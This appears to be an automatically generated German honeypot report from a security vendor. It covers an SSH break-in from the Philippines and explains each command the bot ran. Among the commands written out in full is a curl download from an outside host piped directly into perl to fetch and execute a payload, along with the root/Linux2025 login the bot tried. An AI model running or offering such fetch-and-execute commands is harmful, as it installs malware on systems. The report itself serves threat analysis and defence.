ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Philippinen: Schadcode nachladen und System erkunden

29.09.2026, 18:40 UTC · 2 Befehle · über ssh · Philippinen

Überblick

Dienst
ssh (Port 22)
Herkunft
Philippinen · Philippine Long Distance Telephone Co.
Probierte Zugangsdaten
root / Linux2025

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~

root@srv01:~$ uname -a 2>/dev/null
Linux proxy 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2023-07-05) x86_64 GNU/Linux
root@srv01:~$ curl -sS --max-time 1 http://[IP]/zed 2>/dev/null | perl &
[1] 1234

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich über SSH mit den Standardzugangsdaten root und dem Passwort Linux2025 an. Nach der erfolgreichen Anmeldung führte er zunächst einen Befehl zur Abfrage der Systeminformationen aus. Anschließend lud er ein Skript von einer externen Adresse herunter und leitete es direkt zur Ausführung an den Perl-Interpreter weiter.

Was die Befehle bewirken

Der Befehl uname -a gibt detaillierte Informationen über das Betriebssystem und die Architektur aus, wobei Fehlermeldungen unterdrückt werden. Das Kommando curl lädt eine Datei von der angegebenen URL herunter, wobei die Option max-time den Vorgang nach einer Sekunde abbricht, falls keine Antwort kommt. Der Parameter sS sorgt für stille Ausgabe und zeigt nur Fehler an. Die Pipe leitet den heruntergeladenen Inhalt direkt an perl weiter, was bedeutet, dass der Code ohne vorherige Speicherung auf der Festplatte ausgeführt wird.

Worauf es hinauslief

Das Vorgehen deutet auf die Installation einer Schadsoftware oder eines Botnet-Agents hin. Die Kombination aus automatisierter Anmeldung und sofortigem Download eines Skripts ist typisch für Masseninfektionen. Der genaue Zweck des geladenen Codes bleibt unklar, da die Analyse des Honeypots nur die Ausführung, nicht den Inhalt des Skripts zeigt.

Einordnung

Dieses Muster ist extrem verbreitet und wird von automatisierten Bots täglich millionenfach versucht. Es handelt sich um Standardverhalten im Rahmen von Botnet-Aktivitäten, die nach schwach gesicherten Systemen suchen.